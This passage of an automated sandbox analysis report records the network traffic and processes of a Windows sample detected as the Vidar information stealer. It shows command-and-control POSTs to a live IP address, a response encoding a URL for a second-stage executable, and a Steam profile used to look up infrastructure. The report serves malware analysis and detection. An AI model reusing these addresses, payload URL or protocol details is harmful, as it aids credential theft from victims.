                                                                                                                                                                                                                    Data Ascii: KKOSWV/upGhZm78AcmrbSV2ZJNuyErpvCniCz0NLsXSTN5xQr5Sg9M5zkj1rm2jlS7+yPBMlz/zwaJg/r90jNRCVGjMikmMEAuASAT0ye2cH8q569OniKfJJ6eR24StXwdX2kI667p/8A9L/AOE+0n/njef9+1/+KpP+E+0n/nhe/wDftf8A4qvOxBcG0N2LW4NqM5nELGMYOD82MdfehIpZrWS6ht55bePPmTRxMyJgZOWAwOK4P7Lwv87+9f5
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:08 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    22192.168.2.85625849.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAK
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JEBGIIDBKEBFBGCAEBAKCont
                                                                                                                                                                                                                    2024-10-03 13:15:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:10 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:10 UTC99INData Raw: 35 38 0d 0a 4d 54 49 32 4e 7a 67 34 4f 58 78 6f 64 48 52 77 4f 69 38 76 63 47 78 68 65 57 51 75 61 47 56 68 62 48 52 6f 62 6d 78 70 5a 6d 55 75 63 47 73 76 62 47 52 74 63 79 39 68 4e 44 4d 30 4f 44 59 78 4d 6a 67 7a 4e 44 63 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 58MTI2Nzg4OXxodHRwOi8vcGxheWQuaGVhbHRobmxpZmUucGsvbGRtcy9hNDM0ODYxMjgzNDcuZXhlfDF8a2tra3w=0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    23192.168.2.85626249.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:18 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:18 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JDAFBKECAKFCAAAKJDAKCont
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:19 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    24192.168.2.856263104.102.49.2544435276C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:19 GMT
                                                                                                                                                                                                                    Content-Length: 34837
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: sessionid=917a177f0c4b073740d0fd9e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                                                                    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    25192.168.2.856266172.67.166.764435276C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:20 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                    Host: advocachark.store
                                                                                                                                                                                                                    2024-10-03 13:15:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                    2024-10-03 13:15:21 UTC774INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=4dr3q26knitpk1i6jahu4rdd7g; expires=Mon, 27 Jan 2025 07:02:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tsf4WuhlPbFT0huJk%2By%2F5WwXyYeSiphRQZSktBdRmpQojxRP0qV2o052cfoXGxUFLCJrnAOWUIYV7tdxE6aMHXk0AzXH1yIg5Il4mIiJcgwDdJMi6Jo%2BMyynVmAUFHIPqP6DKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8ccd334f5a5f1809-EWR
                                                                                                                                                                                                                    2024-10-03 13:15:21 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                    2024-10-03 13:15:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    26192.168.2.85626549.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:15:20 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HJJKFBGCFHCGDHIDAAECCont
                                                                                                                                                                                                                    2024-10-03 13:15:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                                    File size:573'304 bytes
                                                                                                                                                                                                                    MD5 hash:C9784DB0C88A05A8AAE9DDB7289B51DB
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x320000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x730000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\ProgramData\CBFCFBFBFB.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\ProgramData\CBFCFBFBFB.exe"
                                                                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                                                                    File size:540'536 bytes
                                                                                                                                                                                                                    MD5 hash:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x3f0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
